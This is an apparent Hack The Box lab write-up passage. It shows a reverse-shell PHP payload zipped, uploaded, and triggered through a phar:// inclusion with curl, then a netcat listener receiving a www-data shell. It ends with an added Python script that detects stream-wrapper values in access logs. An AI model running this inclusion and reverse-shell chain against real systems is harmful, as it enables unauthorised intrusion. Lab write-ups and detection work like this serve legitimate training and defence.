Phar
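The target web application offers a file upload feature when creating tickets, restricted to the .zip extension only. While .phar files are essentially PHP archive files, PHAR can also be used as a protocol (the phar:// stream wrapper), which can address a file inside an archive, including a ZIP archive.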
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ zip payload.zip revshell.php
adding: revshell.php (deflated 72%)
Archiving the PHP reverse shell payload
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ curl -s 'http://itrc.ssg.htb/index.php?page=phar:///var/www/itrc/uploads/60eac432b5847866b5b7afde5c7dfb5f4bba03e9.zip/revshell'
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ nnc 9998
listening on [any] 9998 ...
connect to [10.10.14.172] from (UNKNOWN) [10.10.11.27] 32874
SOCKET: Shell has connected! PID: 92839
whoami
www-data
hostname
itrc
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.223.0.3 netmask 255.255.0.0 broadcast 172.223.255.255
ether 02:42:ac:df:00:03 txqueuelen 0 (Ethernet)
RX packets 17529570 bytes 1703751675 (1.5 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 14182281 bytes 2671249792 (2.4 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 91226 bytes 9779422 (9.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 91226 bytes 9779422 (9.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established on the target environment as the www-data account
It appears to be a Docker container
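A detection sketch for the request shown above, added here as an example and not part of the original notes: it scans web access log lines for query parameters whose decoded value begins with a PHP stream wrapper such as phar://. The log lines, client addresses and the example.zip file name are constructed, and the wrapper list is an assumption to adjust per application.

```python
import re
from urllib.parse import parse_qsl, unquote

# PHP stream wrappers that should never appear in a request parameter value.
# The list is an assumption; trim or extend it for the application at hand.
WRAPPERS = ("phar", "php", "zip", "data", "expect", "file", "glob")
WRAPPER_RE = re.compile(r"(" + "|".join(WRAPPERS) + r")://", re.IGNORECASE)
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample lines in combined log format (not taken from the target).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2025:10:00:00 +0000] "GET /index.php?page=phar:///var/www/itrc/uploads/example.zip/revshell HTTP/1.1" 200 512',
    '203.0.113.6 - - [01/Jan/2025:10:00:05 +0000] "GET /index.php?page=dashboard HTTP/1.1" 200 2048',
    '203.0.113.5 - - [01/Jan/2025:10:00:09 +0000] "GET /index.php?page=PHAR%253A%252F%252F%252Fvar%252Fwww%252Fitrc%252Fuploads%252Fexample.zip%252Frevshell HTTP/1.1" 200 512',
]

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding, a common way to slip past simple filters."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def wrapper_params(log_line):
    """Return (parameter, wrapper, decoded value) for each suspicious parameter."""
    request = REQUEST_RE.search(log_line)
    if not request:
        return []
    query = request.group(1).partition("?")[2]
    hits = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = decode_fully(raw)
        found = WRAPPER_RE.match(value)  # anchored: the wrapper must lead the value
        if found:
            hits.append((name, found.group(1).lower(), value))
    return hits

def scan(lines):
    """Map line index -> hits, keeping only the lines that triggered."""
    return {i: h for i, line in enumerate(lines) if (h := wrapper_params(line))}

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG).items():
        print(index, hits)
```

A hit on a parameter that selects a page or template is worth correlating with recent uploads by the same client, since the wrapper path has to point at a file already on disk.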